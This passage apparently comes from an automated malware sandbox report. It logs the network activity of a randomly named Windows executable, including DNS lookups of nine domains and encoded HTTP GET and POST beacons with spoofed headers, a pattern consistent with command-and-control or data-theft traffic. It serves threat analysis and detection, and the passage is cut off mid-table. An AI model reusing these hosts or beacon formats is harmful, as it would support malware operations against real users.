Jan 15, 2025 19:43:09.166244984 CET	64464	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:10.544975996 CET	64465	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:10.550030947 CET	80	64465	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:10.550132036 CET	64465	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:10.558788061 CET	64465	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:10.563600063 CET	80	64465	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:11.456967115 CET	80	64465	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:11.457873106 CET	80	64465	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:11.457952976 CET	80	64465	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:11.457952023 CET	64465	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:11.458050966 CET	64465	80	192.168.2.4	172.67.183.191

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 19:40:23.080708981 CET	53	54811	1.1.1.1	192.168.2.4
Jan 15, 2025 19:41:07.209634066 CET	58672	53	192.168.2.4	1.1.1.1
Jan 15, 2025 19:41:07.279954910 CET	53	58672	1.1.1.1	192.168.2.4
Jan 15, 2025 19:41:22.998202085 CET	62411	53	192.168.2.4	1.1.1.1
Jan 15, 2025 19:41:23.010332108 CET	53	62411	1.1.1.1	192.168.2.4
Jan 15, 2025 19:41:36.154423952 CET	56181	53	192.168.2.4	1.1.1.1
Jan 15, 2025 19:41:36.167829037 CET	53	56181	1.1.1.1	192.168.2.4
Jan 15, 2025 19:41:49.466957092 CET	53710	53	192.168.2.4	1.1.1.1
Jan 15, 2025 19:41:49.526268959 CET	53	53710	1.1.1.1	192.168.2.4
Jan 15, 2025 19:42:02.843044043 CET	60126	53	192.168.2.4	1.1.1.1
Jan 15, 2025 19:42:03.319873095 CET	53	60126	1.1.1.1	192.168.2.4
Jan 15, 2025 19:42:16.670006990 CET	65351	53	192.168.2.4	1.1.1.1
Jan 15, 2025 19:42:16.682674885 CET	53	65351	1.1.1.1	192.168.2.4
Jan 15, 2025 19:42:30.006505966 CET	60167	53	192.168.2.4	1.1.1.1
Jan 15, 2025 19:42:30.019428015 CET	53	60167	1.1.1.1	192.168.2.4
Jan 15, 2025 19:42:43.310529947 CET	61620	53	192.168.2.4	1.1.1.1
Jan 15, 2025 19:42:43.353638887 CET	53	61620	1.1.1.1	192.168.2.4
Jan 15, 2025 19:43:01.670212030 CET	63365	53	192.168.2.4	1.1.1.1
Jan 15, 2025 19:43:01.700288057 CET	53	63365	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 19:41:07.209634066 CET	192.168.2.4	1.1.1.1	0x9549	Standard query (0)	www.mraber.dev	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:41:22.998202085 CET	192.168.2.4	1.1.1.1	0xfc53	Standard query (0)	www.blockconnect.tech	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:41:36.154423952 CET	192.168.2.4	1.1.1.1	0x8f6e	Standard query (0)	www.jackys.shop	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:41:49.466957092 CET	192.168.2.4	1.1.1.1	0x3aab	Standard query (0)	www.100millionjobs.africa	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:02.843044043 CET	192.168.2.4	1.1.1.1	0x51ed	Standard query (0)	www.l33900.xyz	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:16.670006990 CET	192.168.2.4	1.1.1.1	0x9a71	Standard query (0)	www.cikolatasampuan.xyz	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:30.006505966 CET	192.168.2.4	1.1.1.1	0x23f7	Standard query (0)	www.buildfuture.website	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:43.310529947 CET	192.168.2.4	1.1.1.1	0xdeba	Standard query (0)	www.accusolution.pro	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:43:01.670212030 CET	192.168.2.4	1.1.1.1	0x65a9	Standard query (0)	www.6hcwz.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 19:41:07.279954910 CET	1.1.1.1	192.168.2.4	0x9549	No error (0)	www.mraber.dev	mraber.dev		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 19:41:07.279954910 CET	1.1.1.1	192.168.2.4	0x9549	No error (0)	mraber.dev		46.38.243.234	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:41:23.010332108 CET	1.1.1.1	192.168.2.4	0xfc53	No error (0)	www.blockconnect.tech		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:41:23.010332108 CET	1.1.1.1	192.168.2.4	0xfc53	No error (0)	www.blockconnect.tech		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:41:36.167829037 CET	1.1.1.1	192.168.2.4	0x8f6e	No error (0)	www.jackys.shop		217.160.0.207	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:41:49.526268959 CET	1.1.1.1	192.168.2.4	0x3aab	No error (0)	www.100millionjobs.africa	100millionjobs.africa		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 19:41:49.526268959 CET	1.1.1.1	192.168.2.4	0x3aab	No error (0)	100millionjobs.africa		136.243.64.147	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:03.319873095 CET	1.1.1.1	192.168.2.4	0x51ed	No error (0)	www.l33900.xyz		162.218.30.235	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:16.682674885 CET	1.1.1.1	192.168.2.4	0x9a71	No error (0)	www.cikolatasampuan.xyz		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:16.682674885 CET	1.1.1.1	192.168.2.4	0x9a71	No error (0)	www.cikolatasampuan.xyz		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:16.682674885 CET	1.1.1.1	192.168.2.4	0x9a71	No error (0)	www.cikolatasampuan.xyz		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:16.682674885 CET	1.1.1.1	192.168.2.4	0x9a71	No error (0)	www.cikolatasampuan.xyz		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:16.682674885 CET	1.1.1.1	192.168.2.4	0x9a71	No error (0)	www.cikolatasampuan.xyz		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:16.682674885 CET	1.1.1.1	192.168.2.4	0x9a71	No error (0)	www.cikolatasampuan.xyz		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:16.682674885 CET	1.1.1.1	192.168.2.4	0x9a71	No error (0)	www.cikolatasampuan.xyz		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:30.019428015 CET	1.1.1.1	192.168.2.4	0x23f7	No error (0)	www.buildfuture.website		162.0.236.169	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:42:43.353638887 CET	1.1.1.1	192.168.2.4	0xdeba	No error (0)	www.accusolution.pro	accusolution.pro		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 19:42:43.353638887 CET	1.1.1.1	192.168.2.4	0xdeba	No error (0)	accusolution.pro		185.68.108.243	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:43:01.700288057 CET	1.1.1.1	192.168.2.4	0x65a9	No error (0)	www.6hcwz.info		172.67.183.191	A (IP address)	IN (0x0001)	false
Jan 15, 2025 19:43:01.700288057 CET	1.1.1.1	192.168.2.4	0x65a9	No error (0)	www.6hcwz.info		104.21.56.98	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.mraber.dev

www.blockconnect.tech

www.jackys.shop

www.100millionjobs.africa

www.l33900.xyz

www.cikolatasampuan.xyz

www.buildfuture.website

www.accusolution.pro

www.6hcwz.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	64256	46.38.243.234	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:41:07.303493977 CET	550	OUT	GET /01t1/?PZtTT8P0=1orlDBOBFQxYzSuWLacVhHe2PDi9PTCa7cnqSRM6j2dTNHZ3aoLms1oR3jIyiKF+ssvS0FwSw+yrc7LLwgLD18XxPZI4FqTqW/SwUul9eN4m0LS6rOGRGO8=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1 Host: www.mraber.dev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Jan 15, 2025 19:41:07.949073076 CET	456	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 18:38:23 GMT Server: Apache/2.4.10 (Debian) Content-Length: 276 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 72 61 62 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.mraber.dev Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	64354	13.248.169.48	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:41:23.042963982 CET	827	OUT	POST /yrw8/ HTTP/1.1 Host: www.blockconnect.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.blockconnect.tech Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.blockconnect.tech/yrw8/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 63 48 35 61 59 76 73 61 47 74 43 61 74 6c 75 79 36 34 37 51 33 57 42 63 76 51 34 4b 77 55 34 34 36 37 51 47 4c 55 6e 35 65 50 32 65 70 42 70 76 79 42 45 6d 62 51 54 54 32 30 4b 43 4b 4c 31 2b 4b 52 41 49 4f 6b 7a 74 4c 38 67 69 67 57 58 71 68 4e 6c 47 6a 2f 52 65 6a 43 76 59 34 6d 51 44 62 36 6b 6b 5a 32 54 53 66 6b 57 6b 68 70 4f 51 45 6e 73 4b 59 31 43 44 62 45 50 55 4a 34 63 70 36 73 34 51 4d 74 75 70 37 35 4e 69 46 30 72 48 30 6d 52 43 75 44 75 75 36 76 30 74 44 36 49 41 33 4b 57 7a 61 4a 38 77 32 42 43 77 54 45 30 52 59 32 5a 72 51 43 44 45 7a 79 38 34 4b 4c 31 74 33 67 3d 3d Data Ascii: PZtTT8P0=cH5aYvsaGtCatluy647Q3WBcvQ4KwU4467QGLUn5eP2epBpvyBEmbQTT20KCKL1+KRAIOkztL8gigWXqhNlGj/RejCvY4mQDb6kkZ2TSfkWkhpOQEnsKY1CDbEPUJ4cp6s4QMtup75NiF0rH0mRCuDuu6v0tD6IA3KWzaJ8w2BCwTE0RY2ZrQCDEzy84KL1t3g==
Jan 15, 2025 19:41:23.488821030 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	64370	13.248.169.48	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:41:25.598872900 CET	847	OUT	POST /yrw8/ HTTP/1.1 Host: www.blockconnect.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.blockconnect.tech Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.blockconnect.tech/yrw8/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 63 48 35 61 59 76 73 61 47 74 43 61 33 42 71 79 34 5a 37 51 32 32 42 66 79 67 34 4b 2b 45 34 38 36 37 63 47 4c 51 2f 70 66 36 6d 65 70 67 5a 76 6f 46 77 6d 61 51 54 54 35 55 4b 39 41 72 31 78 4b 52 4d 36 4f 68 62 74 4c 38 6b 69 67 55 50 71 68 2b 39 46 69 76 52 63 71 69 76 65 31 47 51 44 62 36 6b 6b 5a 32 47 46 66 6b 4f 6b 69 61 57 51 46 43 41 46 45 6c 43 41 63 45 50 55 4e 34 64 67 36 73 35 33 4d 73 7a 30 37 2f 4a 69 46 30 62 48 36 58 52 44 35 54 75 73 6b 66 31 4f 53 76 52 2f 78 61 6e 56 61 49 4d 69 33 68 47 38 57 43 35 4c 4a 48 34 38 43 43 6e 33 75 31 31 4d 48 49 49 6b 73 70 7a 78 35 59 55 77 78 33 57 75 2b 34 30 4a 64 61 50 41 6b 6b 73 3d Data Ascii: PZtTT8P0=cH5aYvsaGtCa3Bqy4Z7Q22Bfyg4K+E4867cGLQ/pf6mepgZvoFwmaQTT5UK9Ar1xKRM6OhbtL8kigUPqh+9FivRcqive1GQDb6kkZ2GFfkOkiaWQFCAFElCAcEPUN4dg6s53Msz07/JiF0bH6XRD5Tuskf1OSvR/xanVaIMi3hG8WC5LJH48CCn3u11MHIIkspzx5YUwx3Wu+40JdaPAkks=
Jan 15, 2025 19:41:26.054461956 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	64388	13.248.169.48	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:41:28.146150112 CET	10929	OUT	POST /yrw8/ HTTP/1.1 Host: www.blockconnect.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.blockconnect.tech Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.blockconnect.tech/yrw8/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 63 48 35 61 59 76 73 61 47 74 43 61 33 42 71 79 34 5a 37 51 32 32 42 66 79 67 34 4b 2b 45 34 38 36 37 63 47 4c 51 2f 70 66 36 75 65 70 7a 52 76 72 6b 77 6d 5a 51 54 54 77 30 4b 38 41 72 31 57 4b 52 46 7a 4f 68 58 58 4c 35 34 69 68 33 48 71 74 66 39 46 37 2f 52 63 6f 69 76 66 34 6d 51 61 62 2b 41 67 5a 32 57 46 66 6b 4f 6b 69 66 61 51 54 6e 73 46 55 56 43 44 62 45 50 49 4a 34 64 49 36 73 51 49 4d 73 32 44 37 4f 31 69 46 55 4c 48 34 6c 4a 44 6d 6a 75 79 6c 66 31 6f 53 76 56 65 78 61 4c 4f 61 49 34 4d 33 6a 61 38 62 7a 41 45 63 32 6f 63 54 7a 76 75 7a 6c 78 77 42 34 34 79 67 71 37 2f 71 49 77 4f 71 45 33 48 39 2f 64 51 5a 49 33 52 31 68 63 73 67 6d 2b 47 51 45 62 2b 42 37 31 56 53 72 6e 57 38 59 4d 32 42 73 71 4c 30 4f 2b 6c 36 4b 41 76 68 64 45 42 6b 67 30 6a 4c 32 32 35 6a 30 67 2b 67 79 47 72 43 71 38 4a 45 58 57 39 38 35 4a 4b 71 4a 64 74 45 62 74 67 75 69 56 42 6b 35 33 48 38 2b 37 77 30 44 78 2b 58 49 36 4f 59 59 79 43 70 61 39 39 39 42 46 44 36 33 49 52 4b 44 67 76 56 [TRUNCATED] Data Ascii: PZtTT8P0=cH5aYvsaGtCa3Bqy4Z7Q22Bfyg4K+E4867cGLQ/pf6uepzRvrkwmZQTTw0K8Ar1WKRFzOhXXL54ih3Hqtf9F7/Rcoivf4mQab+AgZ2WFfkOkifaQTnsFUVCDbEPIJ4dI6sQIMs2D7O1iFULH4lJDmjuylf1oSvVexaLOaI4M3ja8bzAEc2ocTzvuzlxwB44ygq7/qIwOqE3H9/dQZI3R1hcsgm+GQEb+B71VSrnW8YM2BsqL0O+l6KAvhdEBkg0jL225j0g+gyGrCq8JEXW985JKqJdtEbtguiVBk53H8+7w0Dx+XI6OYYyCpa999BFD63IRKDgvVynAqlGeJF8hI4dNk28t5lJrt+VeqbBp/k/UJGDYJ/vM3DUnxg4oSY2SXe6oWdUVSiwS5nWu01jr3wAlgO7kcPQLLVZKo4CYvyCFXbG3+w5emLqtS8Rw4WYj4BnWnB2O+ZTS5Nh8/OvUxWpAd7UAPuUXOjkZqty5un85odSSZo0pfpCghUZbjFwJizpiS2ceH9bsPo/jQVho/ASP7Pz1MqoJojOJAUQiLfLBn8wtoAQNnZVu1fFjFBF/lV/AZM6HK14aDyuYciw4Ne/lv+140QuK3JrXLFuC8FE/O86ezARI9OHaYTS8rFBuQGdr/8E4ewT550X8Eaukp6jHye5p9OCVdUCsjNbXWGdwEYgDXXGSg3IRc8PYVh3nrCBbUFbO7vghHCpYPIXC31xsPtpVeG6fz4J9tD2T2XOVJ+WOF9vEB8qkBr7HkLgDK22L10w0yUuHjGOUnt1rheTtG5c72ebWS8Bj5ISU2NqbpLv8Nh03yz0YrU/xSkzGYEQwXuBPfP3POKC2xY8cmNz2sxTsDiqogtMuXH7ppiXwBHkiNeW4o/NZkLDTbvkFI2rLoDx+WftsOFG9ZhBcWdiG2ubjMOGhTfDGaKt2tMGMlvgKHH8BzFuImJnjRhd8+GIBXIv/hUok4XRpEAE1ErWLMKKYU2LZetwwPONUhEl [TRUNCATED]
Jan 15, 2025 19:41:28.596826077 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	64404	13.248.169.48	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:41:30.682738066 CET	557	OUT	GET /yrw8/?PZtTT8P0=RFR6bYZjT9m40Qm+zbryzANOuUFT5Vwsrp8mJhbrSqaa0hAU+0NzQA7l3HeOPbt8HBkBLiHPDpxMijTsjbxyiMcdqRih2VgGUZM/FBv+f3nAi4b7MCsEdgs=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1 Host: www.blockconnect.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Jan 15, 2025 19:41:31.133748055 CET	386	IN	HTTP/1.1 200 OK content-type: text/html date: Wed, 15 Jan 2025 18:41:31 GMT content-length: 265 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 50 5a 74 54 54 38 50 30 3d 52 46 52 36 62 59 5a 6a 54 39 6d 34 30 51 6d 2b 7a 62 72 79 7a 41 4e 4f 75 55 46 54 35 56 77 73 72 70 38 6d 4a 68 62 72 53 71 61 61 30 68 41 55 2b 30 4e 7a 51 41 37 6c 33 48 65 4f 50 62 74 38 48 42 6b 42 4c 69 48 50 44 70 78 4d 69 6a 54 73 6a 62 78 79 69 4d 63 64 71 52 69 68 32 56 67 47 55 5a 4d 2f 46 42 76 2b 66 33 6e 41 69 34 62 37 4d 43 73 45 64 67 73 3d 26 2d 48 54 30 3d 65 5a 5a 78 30 4c 55 68 70 34 75 38 4e 62 37 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PZtTT8P0=RFR6bYZjT9m40Qm+zbryzANOuUFT5Vwsrp8mJhbrSqaa0hAU+0NzQA7l3HeOPbt8HBkBLiHPDpxMijTsjbxyiMcdqRih2VgGUZM/FBv+f3nAi4b7MCsEdgs=&-HT0=eZZx0LUhp4u8Nb7"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	64438	217.160.0.207	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:41:36.190784931 CET	809	OUT	POST /tc4z/ HTTP/1.1 Host: www.jackys.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.jackys.shop Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.jackys.shop/tc4z/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 71 77 66 37 49 69 43 49 66 5a 65 34 48 68 4e 61 73 44 7a 56 6b 4b 71 5a 70 33 59 47 45 69 30 73 6c 51 32 72 53 4d 56 31 53 70 41 76 73 35 53 74 47 4b 4d 50 7a 44 64 75 35 49 42 71 59 52 79 33 49 4d 73 36 77 78 78 33 30 36 50 53 55 62 71 79 31 6b 79 7a 58 4d 45 50 35 76 4b 32 79 66 4a 34 2b 55 4d 42 54 48 41 30 43 35 2f 7a 4f 51 69 72 48 30 32 30 39 70 75 6e 61 59 43 6f 41 54 6a 63 56 34 52 35 4e 64 44 62 48 30 6e 75 54 67 73 64 42 58 4f 65 4b 2b 75 37 51 36 4b 2b 74 4f 43 31 4b 43 36 73 67 75 30 42 4d 35 43 4b 6f 32 52 36 4d 42 78 72 38 63 44 43 33 72 65 6d 6c 48 38 4a 61 67 3d 3d Data Ascii: PZtTT8P0=qwf7IiCIfZe4HhNasDzVkKqZp3YGEi0slQ2rSMV1SpAvs5StGKMPzDdu5IBqYRy3IMs6wxx306PSUbqy1kyzXMEP5vK2yfJ4+UMBTHA0C5/zOQirH0209punaYCoATjcV4R5NdDbH0nuTgsdBXOeK+u7Q6K+tOC1KC6sgu0BM5CKo2R6MBxr8cDC3remlH8Jag==
Jan 15, 2025 19:41:36.861893892 CET	200	IN	HTTP/1.1 302 Found Content-Type: text/html Content-Length: 0 Connection: close Date: Wed, 15 Jan 2025 18:41:36 GMT Server: Apache Cache-Control: no-cache Location: https://jackys.shop/tc4z/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	64439	217.160.0.207	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:41:38.737420082 CET	829	OUT	POST /tc4z/ HTTP/1.1 Host: www.jackys.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.jackys.shop Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.jackys.shop/tc4z/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 71 77 66 37 49 69 43 49 66 5a 65 34 56 53 46 61 6a 45 76 56 69 71 71 61 6c 58 59 47 65 53 31 45 6c 51 79 72 53 49 4e 6c 53 62 30 76 73 59 69 74 58 37 4d 50 2f 6a 64 75 78 6f 42 72 63 52 79 38 49 4d 67 55 77 77 4e 33 30 37 72 53 55 66 75 79 31 56 79 30 57 63 45 42 68 66 4b 77 32 66 4a 34 2b 55 4d 42 54 44 6f 4f 43 35 33 7a 4f 67 79 72 56 6c 32 33 7a 4a 75 6d 64 59 43 6f 45 54 69 62 56 34 52 62 4e 5a 62 31 48 32 66 75 54 69 30 64 42 44 69 64 64 75 76 77 64 61 4c 4b 71 65 4f 36 48 43 65 34 71 4f 38 69 49 62 4f 4d 70 77 63 67 64 77 51 38 75 63 6e 78 71 73 58 53 6f 45 42 41 42 74 59 42 31 53 30 43 63 64 61 2b 36 4d 35 56 59 52 34 4f 49 74 6b 3d Data Ascii: PZtTT8P0=qwf7IiCIfZe4VSFajEvViqqalXYGeS1ElQyrSINlSb0vsYitX7MP/jduxoBrcRy8IMgUwwN307rSUfuy1Vy0WcEBhfKw2fJ4+UMBTDoOC53zOgyrVl23zJumdYCoETibV4RbNZb1H2fuTi0dBDidduvwdaLKqeO6HCe4qO8iIbOMpwcgdwQ8ucnxqsXSoEBABtYB1S0Ccda+6M5VYR4OItk=
Jan 15, 2025 19:41:39.380317926 CET	200	IN	HTTP/1.1 302 Found Content-Type: text/html Content-Length: 0 Connection: close Date: Wed, 15 Jan 2025 18:41:39 GMT Server: Apache Cache-Control: no-cache Location: https://jackys.shop/tc4z/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	64440	217.160.0.207	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
